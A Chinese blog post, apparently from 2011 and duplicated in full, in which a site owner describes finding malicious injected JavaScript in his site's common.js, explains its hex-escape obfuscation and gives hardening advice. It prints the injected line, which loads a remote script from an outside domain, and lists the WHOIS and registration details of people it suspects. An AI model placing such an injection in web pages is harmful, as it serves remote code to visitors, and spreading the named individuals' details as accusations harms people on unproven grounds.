吴才亮微博

关注高压输电线路设计、施工、运行与检修;关注互联网技术,网站推广、运营与盈利的微博客!
  • 首页
  • 关于
  • 输电线路
  • 网络营销
  • 站长技术
  • 网络工程
  • 网络推广博客

网络推广博客的javascript被挂马

2011/03/19 1654 Views
博客被挂马
    最近在实习之余开始学习javascript了,主要还是因为自己预备将自己的特长向WEB前端倾斜,包括HTML、CSS、javascript、DOM、SEO等,因而也就没有将太多时间放在博客上,可是前天却发现打开博客一会儿后,会跳转成一个广告页面,浏览器地址替换为:http://www.qq937.com/mhxx/tz/3370.html?cid=3370,网友五月天也在博客反映小红伞提示页面有不安全因素。很典型,本博也被别有用心的人给挂马了。

    通过查看首页源文件,零才确信博客模板并没有被篡改过,于是猜测一定是首页引用的某个JS文件被挂马了。对首页所有引用的JS文件内容检查,最终在SCRIPT/common.js里发现了挂马代码,代码如下:

document.write("<\x73"+"cript src='http://\x61"+"d.\x6E"+
"u99"+".\x63"+"om/i"+"p.asp?l"+"oc=jingmen'><\/s"+"cript>");


    于是删掉该段代码就清除了这个挂马,如果对这段代码感兴趣的可以了解下javascript,其中使用了简单的加密手段,即将部分字母转成了ASCII码,比如\x73代表s,\x61代表a,\x6E代表n,更多的ASCII码大家可以参考ASCII码表。

关于网站被挂马的一点建议
    现在网站被挂马的越来越多了,零才记得上一次牟长青博客也被挂马过,貌似和零才博客被挂马的方式一样,都是通过javascript挂马的。所以,如果站长发现自己的网站被挂马了,第一需要检查的应该就是该页面的源代码和引用javascript的内容。同时,大家可以使用网页挂马分析专家MDecoder检测网站挂马情况,零才今天就是通过该工具锁定common.js文件的。除此之外,站长朋友们还可以安装小红伞杀毒软件,一般的挂马内容都会被检测到的,这样可以尽可能早的知道网站被挂马了。

    当然,避免网站被挂马才是最为关键的,你可以对才在隐患的javascript进行漏洞检测,排除可能的漏洞,但是如果不会查找漏洞和修改javascript的,就需要采用其他的方法了。零才推荐的方法就是将网站所有的javascript放在根目录一个单独的文件夹,比如script文件夹,然后在网站空间的控制面板对该文件夹取消写权限,这样所有javascript文件就不会被篡改了。

曝光
    零才对挂马代码中的域名进行了简单的顺藤摸瓜了一番,找到了该域名以及域名所有人还用的其他域名,在此做个曝光。

引用
nu99.com的whois信息:
Name : Li DeSI
Organization : Guangzhou WeiZhi Soft
Address : Room 850,building No.1, JIayiYuan,No 445,North Road,Guangzhou
City : guangzhoushi
Province/State : guangdongsheng
Country : china
Postal Code : 510410
Phone Number : 86-020-7829898
Fax : 86-020-7829898
Email : hasom@foxmail.com

hasom@foxmail.com 下的其他域名:wa66.com  oy66.com  zom123.net  mp3tj.com

ICP网站备案信息:
备案/许可证号: 粤ICP备09164785号  审核通过时间: 2009-09-07  
主办单位名称: 钟艺
域名:wa66.com  oy66.com  zom123.net

备案/许可证号: 粤ICP备09132699号  审核通过时间: 2009-07-20  
主办单位名称: 罗新华
域名:mp3tj.com

  
    之所以在这里列出改域名所有人的一些信息,不仅是想谴责下那些别有用心的挂马人,更希望饱受过该人骚扰的同学继续努力,找出真凶,为营造和谐互联网而努力!

博客被挂马
最近在实习之余开始学习javascript了,主要还是因为自己预备将自己的特长向WEB前端倾斜,包括HTML、CSS、javascript、DOM、SEO等,因而也就没有将太多时间放在博客上,可是前天却发现打开博客一会儿后,会跳转成一个广告页面,浏览器地址替换为:http://www.qq937.com/mhxx/tz/3370.html?cid=3370,网友五月天也在博客反映小红伞提示页面有不安全因素。很典型,本博也被别有用心的人给挂马了。

通过查看首页源文件,零才确信博客模板并没有被篡改过,于是猜测一定是首页引用的某个JS文件被挂马了。对首页所有引用的JS文件内容检查,最终在SCRIPT/common.js里发现了挂马代码,代码如下:

document.write("<\x73"+"cript src='http://\x61"+"d.\x6E"+
"u99"+".\x63"+"om/i"+"p.asp?l"+"oc=jingmen'><\/s"+"cript>");

于是删掉该段代码就清除了这个挂马,如果对这段代码感兴趣的可以了解下javascript,其中使用了简单的加密手段,即将部分字母转成了ASCII码,比如\x73代表s,\x61代表a,\x6E代表n,更多的ASCII码大家可以参考ASCII码表。

关于网站被挂马的一点建议
现在网站被挂马的越来越多了,零才记得上一次牟长青博客也被挂马过,貌似和零才博客被挂马的方式一样,都是通过javascript挂马的。所以,如果站长发现自己的网站被挂马了,第一需要检查的应该就是该页面的源代码和引用javascript的内容。同时,大家可以使用网页挂马分析专家MDecoder检测网站挂马情况,零才今天就是通过该工具锁定common.js文件的。除此之外,站长朋友们还可以安装小红伞杀毒软件,一般的挂马内容都会被检测到的,这样可以尽可能早的知道网站被挂马了。

当然,避免网站被挂马才是最为关键的,你可以对才在隐患的javascript进行漏洞检测,排除可能的漏洞,但是如果不会查找漏洞和修改javascript的,就需要采用其他的方法了。零才推荐的方法就是将网站所有的javascript放在根目录一个单独的文件夹,比如script文件夹,然后在网站空间的控制面板对该文件夹取消写权限,这样所有javascript文件就不会被篡改了。

曝光
零才对挂马代码中的域名进行了简单的顺藤摸瓜了一番,找到了该域名以及域名所有人还用的其他域名,在此做个曝光。

nu99.com的whois信息:
Name : Li DeSI
Organization : Guangzhou WeiZhi Soft
Address : Room 850,building No.1, JIayiYuan,No 445,North Road,Guangzhou
City : guangzhoushi
Province/State : guangdongsheng
Country : china
Postal Code : 510410
Phone Number : 86-020-7829898
Fax : 86-020-7829898
Email : hasom@foxmail.com

hasom@foxmail.com 下的其他域名:wa66.com  oy66.com  zom123.net  mp3tj.com

ICP网站备案信息:
备案/许可证号: 粤ICP备09164785号  审核通过时间: 2009-09-07  
主办单位名称: 钟艺
域名:wa66.com  oy66.com  zom123.net

备案/许可证号: 粤ICP备09132699号  审核通过时间: 2009-07-20  
主办单位名称: 罗新华
域名:mp3tj.com
    
之所以在这里列出改域名所有人的一些信息,不仅是想谴责下那些别有用心的挂马人,更希望饱受过该人骚扰的同学继续努力,找出真凶,为营造和谐互联网而努力!

    本文来自: 零才网络推广博客(http://www.0cai.net/) 详细出处参考:http://www.0cai.net/post/javascript-guama.html

相关日志 随机日志 热门日志
Javascript中的def
JS延迟加载或JS最后加载代码
javascript的100个
兼容FireFox/IE的系统
DHTML和HTML的区别
又是网站细节问题
最近在考虑互联网创业
零才:如何推广自己的新浪微博?
editplus中汉字显示为乱
MTU是什么?如何确定并修改M
如何删去桌面上精彩小游戏、淘宝
让google earth上显
SLCAD架空送电线路平断面图
经纬仪、水准仪、全站仪的区别
DEDECMS关键词自动加内链
带电作业与停电作业比较有哪些优
bo-blog随机日志插件链接
合肥42中“诱奸门事件”纯属炒
三星I5508成功刷至andr
为什么微博都是140个字?
开机出现Non- system
bluehost和Godadd
三星I5508刷至2.2测评
如何打开注册表?打开注册表命令
dedecms安装出现:�
利用批处理文件实现一键清除系统
dede发布文章后空白的解决办
站长技术 » Javascript 挂马 , javascript , 博客 , 网络推广
引用地址:
注意: 该地址仅在今日23:59:59之前有效
Leave a comment
赞助商链接
随机日志
  • 中国六大电力设计院
  • 广东省有地震带吗?中国的23条地震带!
  • 回家给母亲过生日
  • bo-blog热门日志,随机日志,热门Tags ...
  • 导地线的新线系数
  • 输电线路预防鸟害故障的措施
  • 步步惊心(高清版)第32集
  • 河北雪灾致八万余人受灾 1人死亡25人受伤
  • 如何打开注册表?打开注册表命令
  • editplus中汉字显示为乱码(方格)
归档
  • 2012/05
  • 2012/04
  • 2012/03
  • 2012/02
  • 2012/01
  • 2011/12
  • 2011/11
  • 2011/10
  • 2011/09
  • 2011/08
热门标签
著名机场 网站打不开 上海房价 抹黑qq 电力微博 ie8 0x000b 火电厂 规程规范 透明 图片缓存 地图截屏 改革开放 新浪微博,腾讯微博,搜狐微博,微博字数,搜狐微博 301 自动提取关键字 第11跳 去掉index.php 性文化节 php操作符

Top
Copyright © 电力设计博客 | 网站推广 | 策划方案